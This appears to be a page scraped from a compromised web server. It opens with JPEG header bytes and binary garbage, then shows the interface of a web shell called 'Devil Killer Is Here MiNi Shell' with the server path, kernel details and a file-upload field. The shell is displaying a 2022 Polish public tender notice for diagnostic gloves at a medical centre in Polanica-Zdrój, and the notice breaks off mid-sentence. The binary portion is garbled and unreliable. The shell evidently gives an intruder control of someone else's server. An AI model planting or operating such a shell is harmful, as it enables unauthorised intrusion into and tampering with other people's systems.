JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220421/0012841301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZP/TP/2022/15- rękawice </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SPECJALISTYCZNE CENTRUM MEDYCZNE IM. ŚW. JANA PAWŁA II SPÓŁKA AKCYJNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 020493961</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Pawła II 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Polanica-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">57-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@scm.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.scm.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZP/TP/2022/15- rękawice </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-be5810ca-c136-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00128413</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> bip.scm.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">bip.scm.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz<br/>poczty elektronicznej na adres zp@scm.pl. Pytania do Zamawiającego można zadawać na adres<br/>zp@scm.pl z wyraźnym podaniem w tytule symbolu postępowania. Oferta powinna być<br/>sporządzona w języku polskim, z zachowaniem postaci elektronicznej w formacie danych, w<br/>szczególności .doc, .docx, .xls, .xlsx, .ods, .odt, rtf, .pdf i podpisana kwalifikowanym podpisem<br/>elektronicznym, zaufanym lub osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza złożenie oferty w postaci katalogu</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (zwanego dalej - ogólne rozporządzenie o ochronie danych lub RODO)<br/>informujemy, że:Administratorem Państwa danych osobowych jest Specjalistyczne Centrum Medyczne<br/>im. św. Jana Pawła II spółka akcyjna z siedzibą w Polanicy-Zdroju (dalej: Spółka).Pani/Pana dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu przeprowadzenia<br/>postępowania o udzielenie zamówienia publicznego prowadzonego w trybie przetargu<br/>nieograniczonego oznaczonego ZP/TP/2022/15-rękawice.W związku z przetwarzaniem Państwa<br/>danych osobowych przysługują Państwu: prawo dostępu do swoich danych osobowych oraz ich<br/>sprostowania, usunięcia, ograniczenia przetwarzania, prawo do przenoszenia danych, prawo do<br/>wniesienia sprzeciwu wobec przetwarzania - o ile zachodzą okoliczności i przypadki określone<br/>prawem.Mają Państwo prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy<br/>RODO.Zakres danych, które przetwarzamy jest niezbędny do osiągnięcia wskazanego wyżej celu.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Prawo zamówień publicznych. Niepodanie<br/>określonych danych skutkuje brakiem możliwości rozpatrzenia przez nas Państwa oferty.Pani/Pana<br/>dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy.Na podstawie Państwa danych osobowych Administrator nie będzie<br/>podejmował wobec Państwa zautomatyzowanych decyzji, w tym decyzji będących wynikiem<br/>profilowania.Państwa dane mogą być przekazane podmiotom uprawnionym do uzyskania danych na<br/>podstawie obowiązującego prawa.Mogą Państwo realizować swoje prawa kierując korespondencję na<br/>adres: Specjalistyczne Centrum Medyczne im. św. Jana Pawła II spółka akcyjna 57-320 Polanica-<br/>Zdrój, ul. Jana Pawła II 2,Mogą Państwo również napisać do Inspektora Ochrony Danych w Spółce na<br/>adres e-mail: daneosobowe@scm.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/TP/2022/15- rękawice</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa wraz z rozładunkiem rękawiczek diagnostycznych dla potrzeb<br/>Specjalistycznego Centrum Medycznego im. św. Jana Pawła II S.A.<br/>Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141420-0 - Rękawice chirurgiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W celu wykazania spełniania przez Wykonawcę warunków o których mowa w art. 112 i art. 118<br/>ustawy Pzp Wykonawca zobowiązany jest do złożenia następujących dokumentów i<br/>oświadczeń: 7.1.1. zdolność do występowania w obrocie gospodarczym – na potwierdzenie<br/>Zamawiający żąda od Wykonawcy prowadzącego działalność gospodarczą lub zawodową<br/>dokumentu potwierdzającego, że jest wpisany do jednego z rejestrów zawodowych lub<br/>handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania,<br/>wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,7.1.2.<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów - na potwierdzenie Zamawiający żąda złożenia zezwolenia, licencji,<br/>koncesji lub wpisu do rejestru działalności regulowanej, a w przypadku braku konieczności ich<br/>posiadania, wykonawca składa oświadczenie informując o braku konieczności posiadania w/w<br/>dokumentów,7.1.3. wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej<br/>zapewniającej wykonanie zamówienia, na potwierdzenie Zamawiający żąda złożenia oświadczenia z art. 273 ustawy Pzp. – wg wzoru- ZAŁĄCZNIK NR 3 do SWZ,7.1.4. Wykonawca<br/>musi posiadać zdolność techniczną i zawodową. Na potwierdzenie Zamawiający żąda złożenia<br/>„Wykazu wykonanych dostaw”- zgodnie z ZAŁĄCZNIKIEM NR 5 do SWZ oraz załączenie 2<br/>dokumentów potwierdzających, że dostawy te zostały wykonane lub są wykonywane<br/>należycie.Za spełnienie tego wymogu Zamawiający uzna wykonanie, a w przypadku świadczeń<br/>okresowych lub ciągłych również wykonywanie dostaw przez Wykonawcę w okresie ostatnich 3<br/>lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -<br/>w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz<br/>których dostawy lub usługi zostały wykonane lub są wykonywane.7.1.4.1. referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane,<br/>z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych,<br/>poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu<br/>składania ofert;7.1.4.2. w przypadku zamówień na dostawy lub usługi – oświadczenie<br/>Wykonawcy – jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów , o których mowa w punkcie powyżej.W razie konieczności, szczególnie gdy<br/>wykaz lub dowody, o których mowa odpowiednio powyżej budzą wątpliwości Zamawiającego lub<br/>gdy z referencji albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub<br/>zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego<br/>podmiotu, na rzecz którego, dostawy lub usługi były lub miały zostać wykonane, o przedłożenie<br/>dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.7.1.5. Wykonawca<br/>może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych<br/>sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na<br/>zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych<br/>podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.7.1.6.<br/>Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić<br/>Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych<br/>podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Zobowiązanie podmiotu<br/>udostępniającego zasoby Wykonawcy ma gwarantować rzeczywisty dostęp do tych zasobów<br/>oraz określać w szczególności:7.1.6.1 zakres dostępnych Wykonawcy zasobów podmiotu<br/>udostępniającego zasoby;7.1.6.2 sposób i okres udostępnienia Wykonawcy i wykorzystania<br/>przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu<br/>zamówienia;7.1.6.3 czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach<br/>którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane<br/>zdolności dotyczą.7.1.7. Zamawiający ocenia, czy udostępniane Wykonawcy przez inne<br/>podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna,<br/>pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o<br/>których mowa w art. 112 ust. 2 pkt 3 i 4 oraz bada, czy nie zachodzą wobec tego podmiotu<br/>podstawy wykluczenia, zgodnie z art. 108. ust.1. oraz art. 109 ust.1 pkt 4. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wykazania braku podstaw wykluczenia z postępowania o udzielenie<br/>zamówienia, o których mowa w art. 273 ust 1 pkt 1 ustawy Pzp Wykonawca zobowiązany jest złożyć<br/>następujące dokumenty: 7.2.1. Oświadczenie o braku podstaw do wykluczenia zgodne z art. 108 ust.1<br/>ustawy Pzp wg wzoru - ZAŁĄCZNIK NR 4 do SWZ,7.2.2. Aktualny odpis lub informację z Krajowego<br/>Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art.<br/>109 ust.1 pkt 4 ustawy Pzp, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie o braku podstaw do wykluczenia zgodne z art. 108 ust.1 ustawy Pzp wg wzoru -<br/>ZAŁĄCZNIK NR 4 do SWZ,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dla potwierdzenia wymagań Wykonawca wraz z ofertą przedkłada dla asortymentu wymienionego w załączniku<br/>nr 2 SWZ z zastrzeżeniem art. 107 ust. 2 Pzp.:<br/>10.1. Aktualne świadectwo dopuszczenia do obrotu i stosowania zgodnie z ustawą z dnia 20 maja 2010 r. o wyrobach<br/>medycznych (Dz. U. z 2019 r., poz. 175, 447 i 534 z późn. zm.) lub ustawą z dnia 6 września 2001r. prawo<br/>farmaceutyczne (Dz. U. z 2019 r., poz. 449, 399 i 959 z późn. zm.) 10.3 deklaracji zgodności CE wystawionej przez<br/>wytwórcę i certyfikat jednostki notyfikowanej w obszarze wyrobów medycznych – wymagane prawem lub zgłoszenie do<br/>rejestru wyrobów medycznych wyrobu oznaczonego znakiem CE, dla którego wystawiono deklarację zgodności.<br/>10.2. Wszystkie dokumenty muszą być ważne przez okres na jaki zostanie zawarta umowa art. 10.1 ustawy o wyrobach<br/>medycznych. W przypadku kończącego się terminu ważności dokumentu Wykonawca ma obowiązek dostarczyć<br/>wymagany aktualny dokument w terminie do ostatniego dnia miesiąca poprzedzającego miesiąc upływu terminu ważności.<br/>dokumentu przedstawionego w ofercie przez Wykonawcę. W przypadku gdy dokument traci ważność podczas trwania<br/>umowy Wykonawca musi załączyć do aktualnego dokumentu oświadczenie, że dostarczy przedłużenie dokumentu do<br/>siedziby Zamawiającego.<br/>10.3. Materiały informacyjne dotyczące oferowanego wyrobu zawierające zdjęcia oraz szczegółowy opis przedmiotu<br/>zamówienia potwierdzający wymagania określone przez zamawiającego, z nazwą producenta– w języku polskim.<br/>10.4. Katalogi, opisy lub fotografie produktów itp. w języku polskim, które mają zostać dostarczone zawierające dokładny opis<br/>oferowanego przedmiotu zamówienia, potwierdzający spełnienie wszystkich parametrów wymaganych przez<br/>Zamawiającego – w przypadku braku powyższych dokumentów oferta zostanie odrzucona (z zastrzeżeniem art. 107 ust. 2<br/>Pzp). Przedmiotowe środki dowodowe należy załączyć w postaci pliku oznaczonego, którego pakietu i pozycji<br/>dotyczą. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 10.4. Katalogi, opisy lub fotografie produktów itp. w języku polskim, które mają zostać dostarczone zawierające dokładny opis<br/>oferowanego przedmiotu zamówienia, potwierdzający spełnienie wszystkich parametrów wymaganych przez<br/>Zamawiającego – w przypadku braku powyższych dokumentów oferta zostanie odrzucona (z zastrzeżeniem art. 107 ust. 2<br/>Pzp). Przedmiotowe środki dowodowe należy załączyć w postaci pliku oznaczonego, którego pakietu i pozycji<br/>dotyczą <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 11. Pozostałe dokumenty, które Wykonawca składa wraz z ofertą11.2. Uzupełniony i podpisany<br/>dokument pod nazwą formularz oferty, stanowiący – załącznik nr 1 do SWZ, 11.1. Uzupełniony i<br/>podpisany dokument pod nazwą formularz asortymentowo-cenowy – załącznik nr 2 do SWZ, w<br/>formacie pdf o nazwie pliku wg podanego wzoru: nazwa firmy_numer postępowania11.3.<br/>Oświadczenie dot. obowiązku podatkowego od towarów i usług – załącznik nr 6 do SWZ,11.4.<br/>Uzupełniony projekt umowy o dane Wykonawcy – załącznik nr 7 do SWZ,11.5. Załącznik nr II do<br/>projektu umowy – zał. nr 8 do SWZ,11.6. RODO – załącznik nr 9 do SWZ11.7. Dokumenty<br/>potwierdzające wykaz 2 dostaw <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 3.3.	Zamawiający przewiduje zmianę postanowień zawartej umowy z uwzględnieniem zapisów art. 455 ust. 1 pkt 1 ustawy Pzp (Dz. U. z 2021 r., poz. 2019 z późn. zm.),w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy oraz określa warunki tych zmian poprzez wprowadzenie do zawartej umowy następujących aneksów:<br/>a)	Wykonawca zobowiązany jest do informowania Zamawiającego w okresie obowiązywania umowy o wszystkich zmianach wprowadzonych do przedmiotu umowy lub wycofaniu z produkcji. Wykonawca zobowiązany jest, w przypadku zaistnienia okoliczności, o których mowa w zdaniu poprzednim, do zaproponowania zamiennika, pod warunkiem, że cena zamiennika nie przekracza ceny przedmiotu umowy oraz spełnia parametry określone przez Zamawiającego.<br/>b)	Zamawiający dopuszcza wprowadzenie do zawartej umowy zmiany dotyczącej przedłużenia okresu obowiązywania umowy, z zachowaniem tych samych warunków w przypadku gdy w zakresie ilościowym przedmiot umowy nie zostanie wyczerpany w podstawowym okresie obowiązywania umowy. W przypadku zaistnienia sytuacji o której mowa w zdaniu poprzednim okres obowiązywania umowy nie może łącznie przekroczyć 3-ch lat.<br/>c)	Ilości asortymentu stanowiącego przedmiot zamówienia określone w załączniku nr 1 do Umowy są wartościami szacunkowymi, służącymi do prawidłowego skalkulowania ceny oferty, porównania ofert i wyboru najkorzystniejszej oferty. Ilość zamawianego asortymentu, w ramach realizacji umowy może ulec zmniejszeniu lub zwiększeniu, w ramach poszczególnych pozycji asortymentowych w zależności od rzeczywistych potrzeb Zamawiającego, z zastrzeżeniem, iż wartość oferty a zarazem Umowy wybranego Wykonawcy nie zostanie przekroczona. Zamawiającemu przysługuje prawo do niezrealizowania pełnej ilości i asortymentu umowy określonych w umowie. W takiej sytuacji Wykonawcy 